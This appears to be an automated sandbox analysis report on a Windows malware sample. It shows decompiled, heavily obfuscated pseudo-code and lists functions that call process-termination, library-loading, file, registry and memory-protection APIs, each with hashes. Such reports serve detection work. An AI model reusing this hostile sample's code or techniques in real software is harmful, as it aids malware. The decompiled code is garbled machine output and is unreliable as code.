						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						_t30 =  *0x80000080;
						 *_t30 =  *_t30 + _t30;
						 *((intOrPtr*)(_t30 + 0x800080)) =  *((intOrPtr*)(_t30 + 0x800080)) + _t30;
						 *_t47 =  *_t47 + _t44;
						 *_t30 =  *_t30 + 0x80;
						 *((intOrPtr*)(_t30 - 0x7fffff80)) =  *((intOrPtr*)(_t30 - 0x7fffff80)) + _t30;
						 *((char*)(_t30 - 0x3f3f4000)) =  *((char*)(_t30 - 0x3f3f4000));
						 *_t30 =  *_t30 + _t30;
						 *_t30 =  *_t30 + 1;
						 *_t30 =  *_t30 + _t30;
						goto [far dword [esi];
					}
					asm("popad");
					if(_t59 == 0) {
						goto L17;
					}
					if(_t59 < 0) {
						L15:
						asm("adc [eax], al");
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 & _t29;
						L16:
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t29;
						_t29 = _t29;
						goto L17;
					}
					if(_t59 == 0) {
						goto L16;
					}
					 *[ss:0x56000c01] =  *[ss:0x56000c01] + _t39;
					_t33 = _t33 + 1;
					_push(0x5dc5f02d);
					_push(_t44);
					_t42 = _t39 + 1;
					_t47 = _t47 - 1;
					_push(_t44);
					 *_t42 =  *_t42 + _t33;
					 *_t29 =  *_t29 + _t29;
					_t44 = _t44 + 1;
					 *_t33 =  *_t33 + _t29;
					if( *_t33 <= 0) {
						L14:
						 *_t29 =  *_t29 + _t44;
						asm("adc [eax], dl");
						 *_t42 =  *_t42 + _t29;
						 *((intOrPtr*)(_t29 + _t29)) =  *((intOrPtr*)(_t29 + _t29)) + _t29;
						 *_t42 =  *_t42 - _t29;
						 *_t29 =  *_t29 + _t29;
						 *[ss:eax] =  *[ss:eax] + _t29;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 & _t29;
						 *_t42 =  *_t42 + _t29;
						 *_t29 =  *_t29 + _t42;
						 *((intOrPtr*)(_t29 + 0x5e000008)) =  *((intOrPtr*)(_t29 + 0x5e000008)) + _t42;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t44;
						asm("adc [eax], al");
						 *_t42 =  *_t42 + _t29;
						 *_t29 =  *_t29 + _t42;
						 *((intOrPtr*)(_t29 + 5)) =  *((intOrPtr*)(_t29 + 5)) + _t42;
						 *_t29 =  *_t29 + _t29;
						_push(es);
						_t29 = _t29 |  *_t29;
						 *_t29 =  *_t29 + _t42;
						 *_t29 =  *_t29 + _t29;
						 *_t29 =  *_t29 + _t44;
						goto L15;
					}
					 *_t29 =  *_t29 + _t29;
					asm("insb");
					if ( *_t29 == 0) goto L13;
					 *((intOrPtr*)(_t47 + 0xf)) =  *((intOrPtr*)(_t47 + 0xf)) + _t42;
					 *_t29 =  *_t29 + _t29;
					 *_t29 =  *_t29 + _t29;
					 *_t29 =  *_t29 + _t29;
					_t29 = _t29 +  *_t29;
					goto L14;
				}
				asm("outsd");
				if(_t54 >= 0) {
					goto L6;
				}
				if(_t54 != 0) {
					goto L7;
				}
				 *_t29 =  *_t29 & 0xff485c66;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				asm("int3");
				 *_t29 =  *_t29 ^ _t29;
				_t31 = _t29 + 0xd1d43fad;
				asm("movsb");
				asm("fild dword [edx+0x43]");
				_t39 = 0x4d;
				asm("scasb");
				asm("sahf");
				_t47 = _t47 +  *(_t45 + _t31 * 4 - 0x49) * 9;
				asm("cmc");
				asm("cld");
				_t44 = _t44 + 1;
				 *0x4c513b13 = _t31;
				0x4f7aad2d();
				asm("lodsd");
				_t32 = _t31;
				asm("stosb");
				 *((intOrPtr*)(_t32 - 0x2d)) =  *((intOrPtr*)(_t32 - 0x2d)) + _t32;
				_t29 = _t33 + _t33 ^  *0xFFFFFFFFB65A2BCC;
				_t33 = _t32;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				 *_t29 =  *_t29 + _t29;
				goto L5;
			}
















                              0x00401480
                              0x00401485
                              0x0040148a
                              0x0040148c
                              0x0040148e
                              0x00401490
                              0x00401492
                              0x00401494
                              0x00401495
                              0x00401497
                              0x00401499
                              0x0040149b
                              0x004014a4
                              0x004014a9
                              0x004014ab
                              0x004014ad
                              0x004014af
                              0x004014b1
                              0x004014b3
                              0x004014b5
                              0x004014b7
                              0x004014b7
                              0x004014b7
                              0x004014ba
                              0x004014bc
                              0x004014bd
                              0x004014bf
                              0x00401524
                              0x00401524
                              0x00401525
                              0x00401525
                              0x00401527
                              0x00401529
                              0x0040152e
                              0x00401531
                              0x00401533
                              0x00401536
                              0x00401537
                              0x00401538
                              0x00401538
                              0x004015ac
                              0x004015ac
                              0x004015ae
                              0x004015b0
                              0x004015b3
                              0x004015b5
                              0x004015b7
                              0x004015b9
                              0x004015bb
                              0x004015bd
                              0x004015bf
                              0x004015c1
                              0x004015c3
                              0x004015c5
                              0x004015c7
                              0x004015c9
                              0x004015ce
                              0x004015d0
                              0x004015d6
                              0x004015d8
                              0x004015db
                              0x004015e1
                              0x004015e8
                              0x004015ea
                              0x004015ee
                              0x004015f2
                              0x004015f2
                              0x0040153a
                              0x0040153b
                              0x00000000
                              0x00000000
                              0x0040153d
                              0x004015a0
                              0x004015a0
                              0x004015a2
                              0x004015a4
                              0x004015a6
                              0x004015a6
                              0x004015a8
                              0x004015aa
                              0x00000000
                              0x004015aa
                              0x0040153f
                              0x00000000
                              0x00000000
                              0x00401541
                              0x00401549
                              0x0040154a
                              0x0040154c
                              0x0040154e
                              0x0040154f
                              0x00401551
                              0x00401553
                              0x00401555
                              0x00401557
                              0x00401558
                              0x0040155a
                              0x0040156b
                              0x0040156b
                              0x0040156d
                              0x0040156f
                              0x00401571
                              0x00401574
                              0x00401576
                              0x00401578
                              0x0040157b
                              0x0040157d
                              0x0040157f
                              0x00401581
                              0x00401583
                              0x00401589
                              0x0040158b
                              0x0040158d
                              0x0040158f
                              0x00401591
                              0x00401593
                              0x00401596
                              0x00401598
                              0x00401599
                              0x0040159b
                              0x0040159d
                              0x0040159f
                              0x00000000
                              0x0040159f
                              0x0040155c
                              0x0040155e
                              0x0040155f
                              0x00401561
                              0x00401564
                              0x00401566
                              0x00401568
                              0x0040156a
                              0x00000000
                              0x0040156a
                              0x004014c1
                              0x004014c2
                              0x00000000
                              0x00000000
                              0x004014c4
                              0x00000000
                              0x00000000
                              0x004014c8
                              0x004014cb
                              0x004014cd
                              0x004014d1
                              0x004014d2
                              0x004014d4
                              0x004014d9
                              0x004014da
                              0x004014dd
                              0x004014e4
                              0x004014e5
                              0x004014e6
                              0x004014e8
                              0x004014e9
                              0x004014ec
                              0x004014ed
                              0x004014f2
                              0x004014f7
                              0x004014fe
                              0x00401500
                              0x00401501
                              0x00401504
                              0x00401504
                              0x00401505
                              0x00401507
                              0x00401509
                              0x0040150b
                              0x0040150d
                              0x0040150f
                              0x00401511
                              0x00401513
                              0x00401515
                              0x00401517
                              0x00401519
                              0x0040151b
                              0x0040151d
                              0x0040151f
                              0x00401521
                              0x00401523
                              0x00000000

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.272820152.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.272812236.0000000000400000.00000002.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272832673.0000000000413000.00000004.00020000.sdmp Download File
                              • Associated: 00000000.00000002.272851001.0000000000415000.00000002.00020000.sdmp Download File
                              Similarity
                              • API ID: #100
                              • String ID: VB5!6&*
                              • API String ID: 1341478452-3593831657
                              • Opcode ID: 0ee49d91254aea8a53008e960ae81ec39bd5333347716a5424ee26d512390254
                              • Instruction ID: 23ff2baba90bdd58ef74a492527966d196974bf5c42e489999ea1a95cef10a6a
                              • Opcode Fuzzy Hash: 0ee49d91254aea8a53008e960ae81ec39bd5333347716a5424ee26d512390254
                              • Instruction Fuzzy Hash: 775150A284E7C09FD31387748C695613FB0AE67214B5E46EBC4D2DF1B3E25C084AD766
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02150D7B, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 168COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction ID: e4ed0ae07c95aa67f56e7a8479022a3617762478f0dd93216ef0519b4fff25b2
                              • Opcode Fuzzy Hash: eb99c11291603696b9cad04f4a2219f0b5de5450c7cddc3a570fcb09d9eeb7a3
                              • Instruction Fuzzy Hash: B3518173981214EFDB28CF24DD99FA8A716EF55360F008399EC781B1E8C77858428F91
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02150ECF, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID: y}Uy}Uy}Uy}Uy}Uy}Uy}Uy}U
                              • API String ID: 560597551-526444393
                              • Opcode ID: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
                              • Instruction ID: 56324ef82d574d0285f983b4258202b1aa19969d4984a37956e63881c3c7ad86
                              • Opcode Fuzzy Hash: c7a599d85bf64b9d8138eab6948e88540e580039dcca48462e3fee89a7626fcf
                              • Instruction Fuzzy Hash: 1C510B73485224DFCB18CF24EA99F68A715EF65360F00839ADC385B1EDC77859828F95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0215449E, Relevance: 1.6, APIs: 1, Instructions: 146libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02154FA8
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction ID: a34b420b7667488d408397ff0b56fcb619035bb9c0e4bbe5996ebcb07ee07321
                              • Opcode Fuzzy Hash: 5a3f8738e5c44e15a6c39672ff626bcfc7f435a7a84ac63d1c5b0b09a9098430
                              • Instruction Fuzzy Hash: B8619C77419616DFC648CF24EA6E814BB26FF6A3A0300D399D1141F1FED6B41A428FD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02154450, Relevance: 1.6, APIs: 1, Instructions: 119libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02154FA8
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction ID: 2d0b8430e2191550a56b1e198dc250db853d042c9e7ac22ccfe3b5071a05d671
                              • Opcode Fuzzy Hash: bbc0003e053bec9f1d05a30c9c7b30947e054c67e20b79643b6622e039e3bba4
                              • Instruction Fuzzy Hash: A9511377409255CFC718CF24E669A58BB22FF6A360F008399C4941F2EED7701942CF96
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02154406, Relevance: 1.6, APIs: 1, Instructions: 108libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02154FA8
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction ID: 354c95283c93dc16875ca524d7c432c6e2d4d6eecb9481d62361acd607f5bf33
                              • Opcode Fuzzy Hash: 9f4dab3aaff9c29be0b0896d2621e426f15d918f34bf066a454fd56aabdeb31d
                              • Instruction Fuzzy Hash: 0441FB7741A665DFCB08CF24E66A915BF21FF6A360B009399D0600F1EED6B41942CFD6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02154449, Relevance: 1.6, APIs: 1, Instructions: 59libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LdrInitializeThunk.NTDLL(85667D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79,55E47D79), ref: 02154FA8
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction ID: 0b3f0969b5de20f9aaaf7d2085d5a78b186ea4b23b94eef2984ea1a5c934dd2a
                              • Opcode Fuzzy Hash: a12308ca5e82b66509fed5511bf405bcea7043c41f7bfba579aed47c916f8cf8
                              • Instruction Fuzzy Hash: 5521A9BB415615DF8648CF24E65A814BB25EFAA370300D396D1241F1FED6742A438FE6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 021511BE, Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction ID: 621669a744164800bc35a6264226a63315cd853b6cc3aca21e52a45a2afbefe9
                              • Opcode Fuzzy Hash: 111fc75c17d94bb1bdb5bcc1c5eafa3a19b9961662d2fe220cae4aed841a499d
                              • Instruction Fuzzy Hash: AB21DC77409515EFC648CF24EA5DC18FB25FF7A370700C399A0241F1EED67425428BA5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02151141, Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction ID: dfb847b361dc6c4882ecbe391adac5ede9334cfd4026ff7b898dfc1c53b71623
                              • Opcode Fuzzy Hash: e84d1265c2a56a1d37668c674ffb2be7412c6984f9c56820587bab57e57e1313
                              • Instruction Fuzzy Hash: 6A116B306C4294EEFB326E748C44BE92A566F41304F6442D9AC78561D1C7BA9809CF11
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02156D52, Relevance: 1.5, APIs: 1, Instructions: 11libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryA.KERNELBASE(02154FFA,?,?,0215074C,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02156D98
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction ID: fe3bd0a3e46a3e5308cb7e371cbeab8f23216f2f3d961091156a92167055100c
                              • Opcode Fuzzy Hash: 1390f1346411d48d0962306dc8f17f58410a50f9e9f03bff120d879f12c8c39e
                              • Instruction Fuzzy Hash: CCC08C91C61420EA99790AF10928E3F04298E8D720F404D6CBC36A22004765840086B2
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02153FF4, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02153FD4,0215401A,02150A54,?,?,?,0215074C,2D9CC76C,DFCB8F12), ref: 02154008
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: CreateFile
                              • String ID:
                              • API String ID: 823142352-0
                              • Opcode ID: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction ID: 90778f157ef074656d7de284b4bab831f576b04e2021a8a1eff49e75729f027a
                              • Opcode Fuzzy Hash: e2f8b3fc84afe77b2e44bd9eac774263979335adf19bdf2e5a41aedaa8eff26f
                              • Instruction Fuzzy Hash: A4C092717E0300B6FA348A208D57F8A62159B90F00F30840877093C0C085F1B610C62C
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02151AE8, Relevance: 1.5, APIs: 1, Instructions: 9registryCOMMON
                              Download Yara Rule
                              APIs
                              • RegSetValueExA.KERNELBASE(?,021551B1,00000000,00000001,?,?,?,?,?,?,021512D9,?,?), ref: 02151AF2
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction ID: 7b67aafb765df1ba0a9075a8e93e6a42cc2380995550fc52504d8c73627d7a6f
                              • Opcode Fuzzy Hash: 64b538f98a15a7b66f9e13adba0aec8f6fd2ddc537792962f6e1b7b6ef252922
                              • Instruction Fuzzy Hash: 3CB092B01502047EFA204A008C0AFB77B1AEB10700F200011BA0494094C6A21C20C524
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02155DFC, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                              Download Yara Rule
                              APIs
                              • GetLongPathNameW.KERNELBASE(?,021504EE,00000200,02151C61,?,?,?,?,0215523B,02155200,02151457,?,?,00000004,?,00000000), ref: 02155E0B
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: LongNamePath
                              • String ID:
                              • API String ID: 82841172-0
                              • Opcode ID: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction ID: 1e4b140cf606c8bf0029eb496e81cd6aedcab3da80029c5d0d48980e8bac0d85
                              • Opcode Fuzzy Hash: 05590cfd3447dced2ec1b2ca25b403dcd4ff7b455290660f6856e5da2b667189
                              • Instruction Fuzzy Hash: FBB09275204300BBE650DA10CDC8F5BB7A8BB98700F108804BACA86142C630A804CB21
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02153AFA, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                              Download Yara Rule
                              APIs
                              • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02153B00
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: ProcessTerminate
                              • String ID:
                              • API String ID: 560597551-0
                              • Opcode ID: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction ID: 9e87e462595a512a518c00a17d47155f09dbb2d9b480415b0af4131e7c6f82a4
                              • Opcode Fuzzy Hash: aecf66dd6198122d4e9adfa0709ac85ed8122ce87c6916bf1efd8e00f1959138
                              • Instruction Fuzzy Hash: 84A0113028008A22CAA00A203C0AB8823020B82238F300300203AA80E0C8A0828C8202
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Non-executed Functions

                              Function 021520DE, Relevance: 1.5, Strings: 1, Instructions: 287COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID: dqlU
                              • API String ID: 0-310000895
                              • Opcode ID: b32e2ca8141ed8bddfdbd07a77fedc5d806a668d12dc1116dd0bf330ebf9427f
                              • Instruction ID: 6ef4bd52754b888ee66a0c918306ee1b0101fdc76de90bc5158f047a13e7c30a
                              • Opcode Fuzzy Hash: b32e2ca8141ed8bddfdbd07a77fedc5d806a668d12dc1116dd0bf330ebf9427f
                              • Instruction Fuzzy Hash: 0CB17D76780626EFE758DF28CC90BD6B3A5FF08314F154269ECA993681CB74A854CBD0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0215812E, Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID: MemoryProtectVirtual
                              • String ID: pl[
                              • API String ID: 2706961497-1247790577
                              • Opcode ID: df99b357ea64609044e809f8445638d2ec23e5e027529586f06fcecf4b1027e8
                              • Instruction ID: b2fe24a2663ef524bdc2ffebdda86d42242f8bb04dc9ec0523dc38879b0af35b
                              • Opcode Fuzzy Hash: df99b357ea64609044e809f8445638d2ec23e5e027529586f06fcecf4b1027e8
                              • Instruction Fuzzy Hash: AC918070944362CFCB24DF2884D4B65BBD1AF56324F4682E9DDB68F2D6D7308482CB62
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02152A8A, Relevance: .1, Instructions: 93COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 21171df4a13de49138b05c9144dc6b57b8c2866f25c9c772abede911480e2bb0
                              • Instruction ID: 14b5783eb6462c483c3458ca0c37ebff14bfe33626724b14bc1818ecf85b6df4
                              • Opcode Fuzzy Hash: 21171df4a13de49138b05c9144dc6b57b8c2866f25c9c772abede911480e2bb0
                              • Instruction Fuzzy Hash: 5B31DE71680354DFE725AF28CC88B99B3A2BF04751F2681DAFD759B1E2C7B49880CA51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02157391, Relevance: .0, Instructions: 37COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d8edbd3d5c28803ce7dca4087bed7491259abbe3f191f9a8c117839d92a362eb
                              • Instruction ID: 25d4ac2e5df845943cca37c7d31ffb1437a9113ec1a51d0aeb37329b4c91e146
                              • Opcode Fuzzy Hash: d8edbd3d5c28803ce7dca4087bed7491259abbe3f191f9a8c117839d92a362eb
                              • Instruction Fuzzy Hash: 33F0E275788120CFD365EB68C681E26F791EB09330F9188E4EE65CB655C730E882C625
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02153B0D, Relevance: .0, Instructions: 7COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e53e5fd33beca5809de1a318ee3a1324821cfb966a289847ba21b5ba815d6a5d
                              • Instruction ID: be4beb5e5033e8ab18dfa1de1b0dda5b0695e5da108d909179cbac5332ed4f00
                              • Opcode Fuzzy Hash: e53e5fd33beca5809de1a318ee3a1324821cfb966a289847ba21b5ba815d6a5d
                              • Instruction Fuzzy Hash: BFB092B23005818FEF02DF18C591B4073B0FB14B88B0804D0E002CB612C224E900CA00
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02157802, Relevance: .0, Instructions: 6COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                              • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                              • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                              • Instruction Fuzzy Hash:
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 02156D40, Relevance: .0, Instructions: 5COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000000.00000002.273134912.0000000002150000.00000040.00000001.sdmp, Offset: 02150000, based on PE: false
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: eb959cc3ca19fbbc0d6f663bc9e84f834a9d225fb1cc3f883707eebdbbcd3844
                              • Instruction ID: c4754bb742a1b0ad670f7733ebafc1043cd608d4bd9cd5b9e19de703bf596829
                              • Opcode Fuzzy Hash: eb959cc3ca19fbbc0d6f663bc9e84f834a9d225fb1cc3f883707eebdbbcd3844
                              • Instruction Fuzzy Hash: B2B002757516418FCE55DE19C290F4073B4FB44B90B455894A4519BA61C269E940CA14
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 004110C6, Relevance: 27.1, APIs: 18, Instructions: 117COMMON
                              Download Yara Rule
                              C-Code - Quality: 61%
                              			E004110C6(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a40) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				void* _v44;
				void* _v52;
				char _v56;
				char _v60;
				char _v76;
				intOrPtr _v84;
				intOrPtr _v92;
				void* _v96;
				signed int _v100;
				intOrPtr* _v112;
				signed int _v116;
				char* _t56;
				char* _t57;
				char* _t61;
				signed int _t65;
				char* _t67;
				void* _t91;
				void* _t93;
				intOrPtr _t94;

				_t94 = _t93 - 0xc;
				 *[fs:0x0] = _t94;
				L004012E0();
				_v16 = _t94;
				_v12 = 0x401248;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x4012e6, _t91);
				L00401412();
				L004013EE();
				_v84 = _a4;
				_v92 = 9;
				L00401412();
				_t56 =  &_v76;
				_push(_t56);
				L004013AC();
				_v96 =  ~(0 | _t56 != 0x0000ffff);
				L0040143C();
				_t57 = _v96;
				if(_t57 != 0) {
					if( *0x413010 != 0) {
						_v112 = 0x413010;
					} else {
						_push(0x413010);
						_push(0x402b88);
						L0040142A();
						_v112 = 0x413010;
					}
					_t61 =  &_v56;
					L00401430();
					_v96 = _t61;
					_t65 =  *((intOrPtr*)( *_v96 + 0x130))(_v96,  &_v60, _t61,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x308))( *_v112));
					asm("fclex");
					_v100 = _t65;
					if(_v100 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x130);
						_push(0x403aec);
						_push(_v96);
						_push(_v100);
						L0040145A();
						_v116 = _t65;
					}
					_push(0);
					_push(0);
